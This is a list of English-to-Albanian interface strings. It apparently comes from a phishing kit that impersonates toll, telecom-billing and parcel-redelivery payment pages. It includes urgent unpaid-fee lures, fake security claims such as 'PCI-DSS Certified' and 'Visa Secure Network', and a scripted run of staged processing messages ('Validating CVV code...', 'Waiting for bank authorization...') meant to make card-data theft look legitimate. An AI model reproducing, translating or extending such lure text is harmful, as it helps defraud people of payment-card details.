"Please redeem your favorite product": "Ju lutemi shkëmbeni pikët për produktin tuaj të preferuar",
"Confirm your shipping address": "Konfirmoni adresën tuaj të dorëzimit",
"Order number": "Numri i porosisë: ",
"Pay": "Paguaj",
"Pay Message": "Paguani {0} për të shkëmbyer pikët për produkte",
"Pay electronic tolls online": "Paguani tarifat elektronike online",
"your electronic toll payment was unsuccessful": "Pagesa juaj elektronike e tarifës nuk ishte e suksesshme.",
"Billing Information": "Informacioni i faturimit",
"Description": "Përshkrimi",
"Dear customer": "I/E nderuar klient:",
"Electronic Communications Charge Payment Failed": "Pagesa e tarifës së komunikimit elektronik dështoi",
"Invoice Number": "Numri i faturës",
"Amount": "Shuma",
"Pay Immediately": "Paguaj menjëherë",
"Phone Number": "Numri i telefonit",
"Electronic communication fee payment failed": "Pagesa e tarifës së komunikimit elektronik dështoi",
"Illustrate": "Shpjegim",
"SSL Encryption": "Enkriptim SSL",
"PCI-DSS Certified": "I certifikuar PCI-DSS",
"Transaction Details": "Detajet e transaksionit",
"Transaction ID:": "ID e transaksionit:",
"Processing Network:": "Rrjeti i përpunimit:",
"Processing Time:": "Koha e përpunimit:",
"Security Level:": "Niveli i sigurisë:",
"Preparing...": "Po përgatitet...",
"High": "I lartë",
"Initializing payment environment...": "Po inicializohet ambienti i pagesës...",
"Encrypting card information...": "Po enkriptohen të dhënat e kartës...",
"Establishing secure connection...": "Po krijohet lidhje e sigurt...",
"Verifying card number and issuer...": "Po verifikohet numri i kartës dhe lëshuesi...",
"Validating CVV code...": "Po validohet kodi CVV...",
"Checking fraud risk...": "Po kontrollohet rreziku i mashtrimit...",
"Sending transaction request...": "Po dërgohet kërkesa e transaksionit...",
"Waiting for bank authorization...": "Në pritje të autorizimit nga banka...",
"Processing bank response...": "Po përpunohet përgjigjja e bankës...",
"Confirming transaction status...": "Po konfirmohet statusi i transaksionit...",
"Finalizing transaction...": "Po finalizohet transaksioni...",
"Visa Secure Network": "Rrjeti i sigurt Visa",
"Mastercard Global Payment Network": "Rrjeti global i pagesave Mastercard",
"American Express Dedicated Channel": "Kanali i dedikuar American Express",
"UnionPay Gateway": "Porta UnionPay",
"{time} seconds": "{time} sekonda",
"International Payment Network": "Rrjeti ndërkombëtar i pagesave",
"redelivery_fee_message": "Për ridërgesë duhet të paguani {amount} për tarifat e shërbimit. Paketa juaj do të ridërgohet pas pagesës",
"Verifying...": "Po verifikohet...",
};